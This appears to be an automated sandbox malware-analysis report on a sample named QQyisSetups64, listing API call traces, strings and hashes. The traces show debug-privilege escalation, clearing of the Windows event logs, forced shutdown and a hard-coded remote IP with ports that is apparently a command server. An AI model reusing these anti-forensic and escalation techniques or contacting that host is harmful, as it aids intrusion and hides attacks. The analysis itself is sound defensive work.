API String ID: 1095970075-1170057892
Opcode ID: 6f1def674d5be25debea33c86dd02d32c43fe5c1a38183dcfcc851a51f205786
Instruction ID: 51e0ab9e4d922ee83b8ad830c2447ed46b4a02d1fdb08651645babfea9f63286
Opcode Fuzzy Hash: 6f1def674d5be25debea33c86dd02d32c43fe5c1a38183dcfcc851a51f205786
Instruction Fuzzy Hash: 48418D71780705AFD700EFA8EC59F9E7BB4AB88704F508948F615DB285D779E401CB94

Function 03787620 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,0378DFA4), ref: 03787637
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,0378DFA4), ref: 0378763E
LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0378765A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03787677
CloseHandle.KERNEL32(?), ref: 03787681
GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,0378DFA4), ref: 03787691
GetProcAddress.KERNEL32(00000000), ref: 03787698
GetCurrentProcessId.KERNEL32 ref: 037876BA
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 037876C7

Strings

NtSetInformationProcess, xrefs: 03787687
NtDll.dll, xrefs: 0378768C
SeDebugPrivilege, xrefs: 0378764C

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
API String ID: 1802016953-1577477132
Opcode ID: 55b25b724b6eacab5b0e250278fb66ed406bc927a1d4261f9142f53e5412aaf0
Instruction ID: 63df16cf2dff0ac404127c696104869362978d5bdc7b53cf76e082ff2a69473d
Opcode Fuzzy Hash: 55b25b724b6eacab5b0e250278fb66ed406bc927a1d4261f9142f53e5412aaf0
Instruction Fuzzy Hash: 1E216371A8070CAFD710FFE4DC0AFBE7778EB88710F108509FA05AA1C1DAB455448BA5

Function 0379054D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92memorylibraryloaderCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 03790576
GetSystemInfo.KERNEL32(?), ref: 0379058E
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0379059E
GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 037905AE
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03790600
VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03790615

Strings

SetThreadStackGuarantee, xrefs: 037905A8
kernel32.dll, xrefs: 03790597

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
String ID: SetThreadStackGuarantee$kernel32.dll
API String ID: 3290314748-423161677
Opcode ID: 2d1702591c00eaf8f390fa41cba4999acc9f27c6dc41608ec142811fee678a98
Instruction ID: 20c6b853de3f282f4104a4b2ec93000f3a47c0b64f7099168db2d19ac8826dd1
Opcode Fuzzy Hash: 2d1702591c00eaf8f390fa41cba4999acc9f27c6dc41608ec142811fee678a98
Instruction Fuzzy Hash: E531F572E40619EFEF10EBA4EC84AEEB7B8EF84744F144616F501E3044DB74AA00CB90

Function 03787B70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 03787B89
OpenProcessToken.ADVAPI32(00000000), ref: 03787B90
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03787BB6
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03787BCC
GetLastError.KERNEL32 ref: 03787BD2
CloseHandle.KERNEL32(?), ref: 03787BE0
CloseHandle.KERNEL32(?), ref: 03787BFB

Strings

SeShutdownPrivilege, xrefs: 03787BA2

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3435690185-3733053543
Opcode ID: 41d6b4edd8cadb51a5b8aa9149b929f8026cd514c9913faad920c880c367af02
Instruction ID: 32b17cbe2578eb325c86b23cc08eb9a2083ce8f70f5faade43928a85eef63a75
Opcode Fuzzy Hash: 41d6b4edd8cadb51a5b8aa9149b929f8026cd514c9913faad920c880c367af02
Instruction Fuzzy Hash: 09119871A4060CABD714EFA4DC09FAF7B78EB84700F518559F90597180CA759900CBA0

Function 0378B3C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26COMMON

Download Yara Rule

APIs

OpenEventLogW.ADVAPI32(00000000,037A58BC), ref: 0378B3E7
ClearEventLogW.ADVAPI32(00000000,00000000), ref: 0378B3F2
CloseEventLog.ADVAPI32(00000000), ref: 0378B3F9

Strings

Application, xrefs: 0378B3C6
Security, xrefs: 0378B3CE
System, xrefs: 0378B3D6

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Event$ClearCloseOpen
String ID: Application$Security$System
API String ID: 1391105993-2169399579
Opcode ID: 5543741d8ad8441a4054c4d84028f3cf4647bc9f8444b893a485d40110b8fcf0
Instruction ID: 527788397ce04bdf477112ca7c1942853369ca983d7265c1ff18150b692492a5
Opcode Fuzzy Hash: 5543741d8ad8441a4054c4d84028f3cf4647bc9f8444b893a485d40110b8fcf0
Instruction Fuzzy Hash: 82E02B32605B1857D211EF09E84871FF3D0FBCD715F04461DE98856604C6348401AB95

Function 0360660F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 036066A0
swprintf.LIBCMT ref: 036066F8
swprintf.LIBCMT ref: 0360670B

Strings

:, xrefs: 0360663F
@, xrefs: 036066AC

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: swprintf$_memset
String ID: :$@
API String ID: 1292703666-1367939426
Opcode ID: 3d5004218d91dc4100e046b41ba34f0424eaff1e0d9aac26d7e5b183c8120afd
Instruction ID: 51ff1bffd9c9526fd1153b6e28f6e3cecf10621530f37ce6c56abf64dfb4c297
Opcode Fuzzy Hash: 3d5004218d91dc4100e046b41ba34f0424eaff1e0d9aac26d7e5b183c8120afd
Instruction Fuzzy Hash: 173161B6D0021CABDB14CFE5CC85FEEB7B9FB88300F50421DE90AAB281E6746905CB54

Function 03787740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037878FC), ref: 03787756
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037878FC,?,?,?,?,?,?,771B0630), ref: 0378775D
LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03787785
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 037877B9

Strings

SeDebugPrivilege, xrefs: 0378777E

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeDebugPrivilege
API String ID: 2349140579-2896544425
Opcode ID: 6ae2a15b91c3f51b2c99b7d63027ab45bbafafb50cbfc4d6d574661e37f1a352
Instruction ID: 66141bd9c1461a1ca5024e32575db76f99d08ad9b70fc1f609c026bc6ae93b69
Opcode Fuzzy Hash: 6ae2a15b91c3f51b2c99b7d63027ab45bbafafb50cbfc4d6d574661e37f1a352
Instruction Fuzzy Hash: 90116571A4020CABDB04EFE4DC49BEEB7B4EB48700F108558E505AB280DA759505CB60

Function 0378F00A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0379131C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03791331
UnhandledExceptionFilter.KERNEL32(037A25B8), ref: 0379133C
GetCurrentProcess.KERNEL32(C0000409), ref: 03791358
TerminateProcess.KERNEL32(00000000), ref: 0379135F

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: e9fb8f597072b071108a7ee1727718a67809dc8f8e73f08a91078fd6668a9509
Instruction ID: 4c3566ed50e05dec6c3bdf0dd98c827a73093bcec5e9070b1d96a2858efe1d82
Opcode Fuzzy Hash: e9fb8f597072b071108a7ee1727718a67809dc8f8e73f08a91078fd6668a9509
Instruction Fuzzy Hash: 7A21E0B9541B08EFD740FF2AF9486483BF4BB88301F50D45AE90887389EB789691CF55

Function 02C86815 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 02C8793D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02C87952
UnhandledExceptionFilter.KERNEL32(02C95350), ref: 02C8795D
GetCurrentProcess.KERNEL32(C0000409), ref: 02C87979
TerminateProcess.KERNEL32(00000000), ref: 02C87980

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 63248877459cebc8ff81fa9d1c84fab741d754062998c65b80264bb73cf6303e
Instruction ID: 5a94c3f1b79fba3b490803ccc61687bdc02cc8887023ce0b76acd7318d32ed9d
Opcode Fuzzy Hash: 63248877459cebc8ff81fa9d1c84fab741d754062998c65b80264bb73cf6303e
Instruction Fuzzy Hash: FF21EFB8C84600EFD702DF69F54D7183BA5BB48389F905A5AE4099B350EBB659A0CF48

Function 0378B463 Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 03787B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03787B89
Part of subcall function 03787B70: OpenProcessToken.ADVAPI32(00000000), ref: 03787B90
Part of subcall function 03787B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03787BB6
Part of subcall function 03787B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03787BCC
Part of subcall function 03787B70: GetLastError.KERNEL32 ref: 03787BD2
Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BE0

ExitWindowsEx.USER32(00000005,00000000), ref: 0378B471

Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BFB

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID:
API String ID: 681424410-0
Opcode ID: 72c80c8f8a63fc164683fc934af4520ed2047ad55319fe4fb84e2cb5275a8b35
Instruction ID: 3b64ef46f6172ac85f4a4edbc60bf99ff687c4a3d0805eb0354cda4de5dc0b76
Opcode Fuzzy Hash: 72c80c8f8a63fc164683fc934af4520ed2047ad55319fe4fb84e2cb5275a8b35
Instruction Fuzzy Hash: 41C08C3638024003D218B3BC782AB6AB741DB88362F20442BE71B8C0C00C56849009A6

Function 0378B43F Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 03787B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03787B89
Part of subcall function 03787B70: OpenProcessToken.ADVAPI32(00000000), ref: 03787B90
Part of subcall function 03787B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03787BB6
Part of subcall function 03787B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03787BCC
Part of subcall function 03787B70: GetLastError.KERNEL32 ref: 03787BD2
Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BE0

ExitWindowsEx.USER32(00000006,00000000), ref: 0378B44D

Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BFB

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID:
API String ID: 681424410-0
Opcode ID: c97f6ffc466d7c6105d545f12f5bbf2ebce5d08355ab99779c16590f89c3404e
Instruction ID: a4ccb4ca15f9c9d3d2895ba5149b8168d8c1249fffb334d3d958461b56cb7a49
Opcode Fuzzy Hash: c97f6ffc466d7c6105d545f12f5bbf2ebce5d08355ab99779c16590f89c3404e
Instruction Fuzzy Hash: F7C08C3638020003D218B3BC782AB6AB742DB88362F20442BE60B8C0C00C5784A045A6

Function 0378B41B Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 03787B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03787B89
Part of subcall function 03787B70: OpenProcessToken.ADVAPI32(00000000), ref: 03787B90
Part of subcall function 03787B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03787BB6
Part of subcall function 03787B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03787BCC
Part of subcall function 03787B70: GetLastError.KERNEL32 ref: 03787BD2
Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BE0

ExitWindowsEx.USER32(00000004,00000000), ref: 0378B429

Part of subcall function 03787B70: CloseHandle.KERNEL32(?), ref: 03787BFB

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID:
API String ID: 681424410-0
Opcode ID: b6a932964b7eb2326d9407302fc268143cb8d0e07ceaee746f4a8fca58e6ec68
Instruction ID: 4f29acf1c5a06a970cdba1e3fa42ba358b9dbda7539374a7e89bb7d7a422329b
Opcode Fuzzy Hash: b6a932964b7eb2326d9407302fc268143cb8d0e07ceaee746f4a8fca58e6ec68
Instruction Fuzzy Hash: 4FC08C3638020007D218B3BC782AB69B741DB88362F20442BE70B8C0C00C66849005AA

Function 0378B556 Relevance: 43.9, APIs: 8, Strings: 17, Instructions: 161registrysleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721

RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 0378B586
RegDeleteValueW.ADVAPI32(?,IpDate), ref: 0378B596
RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 0378B5B3
_memset.LIBCMT ref: 0378B5D4
RegCloseKey.ADVAPI32(?), ref: 0378B61B
_memset.LIBCMT ref: 0378B63C
RegCloseKey.ADVAPI32(?), ref: 0378B72C
Sleep.KERNEL32(000007D0), ref: 0378B737

Part of subcall function 0378F707: std::exception::exception.LIBCMT ref: 0378F756
Part of subcall function 0378F707: std::exception::exception.LIBCMT ref: 0378F770
Part of subcall function 0378F707: __CxxThrowException@8.LIBCMT ref: 0378F781

Strings

t2:, xrefs: 0378B6E0
t1:, xrefs: 0378B6A7
19092, xrefs: 0378B6C9
19093, xrefs: 0378B6FF
p2:, xrefs: 0378B6B9
118.107.44.219, xrefs: 0378B6B4
t3:, xrefs: 0378B719
118.107.44.219, xrefs: 0378B6ED
118.107.44.219, xrefs: 0378B67E
o1:, xrefs: 0378B695
p1:, xrefs: 0378B683
Console, xrefs: 0378B57C
IpDate, xrefs: 0378B590, 0378B5AD
o3:, xrefs: 0378B704
19091, xrefs: 0378B690
o2:, xrefs: 0378B6CE
p3:, xrefs: 0378B6F2

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
String ID: 118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
API String ID: 1186799303-3661167401
Opcode ID: 9ed1716ac99e485894786c5cfd5ad17043e699fb5df36ea61aec837eabf48fbc
Instruction ID: 497cac8cbb86d2554d42cc001241eca36f03bcee180b5f21066b8daef1cdc1e9
Opcode Fuzzy Hash: 9ed1716ac99e485894786c5cfd5ad17043e699fb5df36ea61aec837eabf48fbc
Instruction Fuzzy Hash: 8941C5B57C4B047FE210FB18AC4AF5E73549FC5B20F148214FA157E283E7E4A51586AB

Function 03794014 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 0379401C
__mtterm.LIBCMT ref: 03794028

Part of subcall function 03793CF1: DecodePointer.KERNEL32(00000009,03791084,0379106A,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03793D02
Part of subcall function 03793CF1: TlsFree.KERNEL32(00000027,03791084,0379106A,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03793D1C
Part of subcall function 03793CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03791084,0379106A,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03798D48
Part of subcall function 03793CF1: _free.LIBCMT ref: 03798D4B
Part of subcall function 03793CF1: DeleteCriticalSection.KERNEL32(00000027,?,?,03791084,0379106A,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03798D72

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0379403E
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0379404B
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03794058
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03794065
TlsAlloc.KERNEL32(?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 037940B5
TlsSetValue.KERNEL32(00000000,?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 037940D0
__init_pointers.LIBCMT ref: 037940DA
EncodePointer.KERNEL32(?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 037940EB
EncodePointer.KERNEL32(?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 037940F8
EncodePointer.KERNEL32(?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03794105
EncodePointer.KERNEL32(?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03794112
DecodePointer.KERNEL32(Function_00013E75,?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03794133
__calloc_crt.LIBCMT ref: 03794148
DecodePointer.KERNEL32(00000000,?,?,03790FC1,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03794162
GetCurrentThreadId.KERNEL32 ref: 03794174

Strings

FlsFree, xrefs: 0379405A
KERNEL32.DLL, xrefs: 03794017
FlsSetValue, xrefs: 0379404D
FlsAlloc, xrefs: 03794038
FlsGetValue, xrefs: 03794040

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 1c3fbab96d99c3c6055c6fa7f896e31ae3e30ad47a23acf4ba69f9c03ec13e28
Instruction ID: 67b9ae7f1e1f354d20890acdc0dd23d4ab83d0bd18dcb8effcff67135d334763
Opcode Fuzzy Hash: 1c3fbab96d99c3c6055c6fa7f896e31ae3e30ad47a23acf4ba69f9c03ec13e28
Instruction Fuzzy Hash: 1B3152B59407049EFB51FF7AB80CF5A7EB4EF852A0B158717E81086698F7388441DF51

Function 02C89AC6 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89ACE
__mtterm.LIBCMT ref: 02C89ADA

Part of subcall function 02C897A5: DecodePointer.KERNEL32(00000008,02C876A5,02C8768B,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C897B6
Part of subcall function 02C897A5: TlsFree.KERNEL32(00000025,02C876A5,02C8768B,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C897D0
Part of subcall function 02C897A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02C876A5,02C8768B,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C8C031
Part of subcall function 02C897A5: _free.LIBCMT ref: 02C8C034
Part of subcall function 02C897A5: DeleteCriticalSection.KERNEL32(00000025,?,?,02C876A5,02C8768B,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C8C05B

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C89AF0
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C89AFD
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C89B0A
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C89B17
TlsAlloc.KERNEL32(?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89B67
TlsSetValue.KERNEL32(00000000,?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89B82
__init_pointers.LIBCMT ref: 02C89B8C
EncodePointer.KERNEL32(?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89B9D
EncodePointer.KERNEL32(?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89BAA
EncodePointer.KERNEL32(?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89BB7
EncodePointer.KERNEL32(?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89BC4
DecodePointer.KERNEL32(Function_00009929,?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89BE5
__calloc_crt.LIBCMT ref: 02C89BFA
DecodePointer.KERNEL32(00000000,?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89C14
GetCurrentThreadId.KERNEL32 ref: 02C89C26

Strings

FlsFree, xrefs: 02C89B0C
KERNEL32.DLL, xrefs: 02C89AC9
FlsGetValue, xrefs: 02C89AF2
FlsAlloc, xrefs: 02C89AEA
FlsSetValue, xrefs: 02C89AFF

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 62f0e7148cf59c0c4f7e1d2b06d85393eeb0f3cdcf6f42e60c7c7e01b66aae89
Instruction ID: eb3a0cf12c185f346ade5e1bdbbd32b1e0fdc620fed959b80b5abc0099d08c22
Opcode Fuzzy Hash: 62f0e7148cf59c0c4f7e1d2b06d85393eeb0f3cdcf6f42e60c7c7e01b66aae89
Instruction Fuzzy Hash: 3A314131D80214AFDB21BF75BD4C72ABBA6AB8479CB544F2AD404D3250EB358861EF50

Function 0378C3A0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 170stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0378C3C2
_wcsrchr.LIBCMT ref: 0378C3CA
_memset.LIBCMT ref: 0378C401
_wcsrchr.LIBCMT ref: 0378C409
lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0378C416
_memset.LIBCMT ref: 0378C484
wsprintfW.USER32 ref: 0378C49C
_memset.LIBCMT ref: 0378C4B0
_memset.LIBCMT ref: 0378C4CB
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000002), ref: 0378C501
lstrcatW.KERNEL32(?,037A535C), ref: 0378C549
lstrcatW.KERNEL32(?,?), ref: 0378C553
_memset.LIBCMT ref: 0378C56A
